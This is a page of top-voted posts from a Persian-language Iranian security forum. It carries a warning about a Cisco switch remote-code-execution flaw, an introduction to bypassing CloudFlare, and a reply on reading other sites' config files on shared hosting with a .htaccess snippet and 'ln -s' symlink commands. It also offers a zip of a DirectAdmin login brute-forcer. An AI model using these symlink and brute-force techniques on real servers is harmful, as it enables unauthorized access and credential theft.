    با سلام. جدیدا اکسپلویتی اومده برای سوییچ های سیسکو از نوع اجرای کد از راه دور، همکنون باعث اختلال گسترده در برخی از شبکه های حیاتی کشور شده است در این مدل حمله هکر با اجرای کد اکسپلویت تمامی برنامه ریزی روتر و سویچ را به حالت پیشفرض برمی گرداند. این آسیب پذیری طیف زیادی از محصولات این شرکت را در بر می گیرد. و بایستی به سرعت برطرف شود. هم اکنون دیتا سنتر افرانت دچار این مشکل شده است. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
  48. 1 امتیاز
    بسم الله الرحمن الرحیم خب همونطور که از نام تاپیک پیداست این تاپیک مربوط میشه به آموزش جامع روش های بایپس سرویس CloudFlare خب من در پست اول به معرفی CloudFlare و از پست های بعدی به آموزش روش های بایپس می پردازم خب CloudFlare چیست؟ این سرویس با ارائه خدمات امنیتی باعث بهبودی عملکرد سایت ما میشود.سایتی که از این سرویس استفاده می کند 40 درصد سریعتر بارگذاری می شوند و 60 درصد موجب صرفه جویی در مصرف پهنای باند می شود که موجب بالارفتن امنیت وب سایت می شود از جمله دیگر خدماتی که ارائه می کند این است که ربات ها و Crawler هایی که مشکوک که به وب سایت شما آسیب می رساند را به اصطلاح بن کرده و از ورود به سایت و اعمال فعالیت های تخریبی جلوگیری می کند. البته خدمات این سرویس تنها موارد ذکر شده نیست بلکه فراتر هم میرود اما گفتن آن در این مبحث زیاد جایز نیست در پست بعدی اولین روش بایپس رو توضیح خواهم داد یا علی
  49. 1 امتیاز
    سلام خدمت شما , این موضوع که شماره اشاره کردید یکی از روش های دور زدن محدودیت اجرای پرل بود . سلام خدمت شما , باتوجه به اینکه فرمودید Open basedir هم باز هست میتوانید از Openbasedir فایل های کانفیگ رو بخونید نیاز به sym نیست . البته باتوجه به گفته 0x3a میتوانید perl اجرا کنید و شروع به sym زدن کنید ( البته با وجود Open base dir نیاز به پیچوندن لقمه نیست) . روش دیگر هم : فایلی بسازید و htaccess زیر قرار بدید : Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any و با دستور ln -s masir file فایل مورد نظرتون sym برای رفع اررور Forbidden : ln -s / root سرچ کنید چندین تاپیک درمورد forbidden قرار داده شده است . پ.ن : مشخصات سرور قرار بدید راحت تر راهنماییتون کنیم .
  50. 1 امتیاز
    Direct Admin Bruter نرم افزاری برای به دست اوردن رمز و یوزر Direct Admin دو پوشه user هست و یک پوشه password خودتون رمز و یوزر اضافه کنید . داخل این سایت هم یک سرچ کنید هست ... Direct Admin Bruter.zip

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...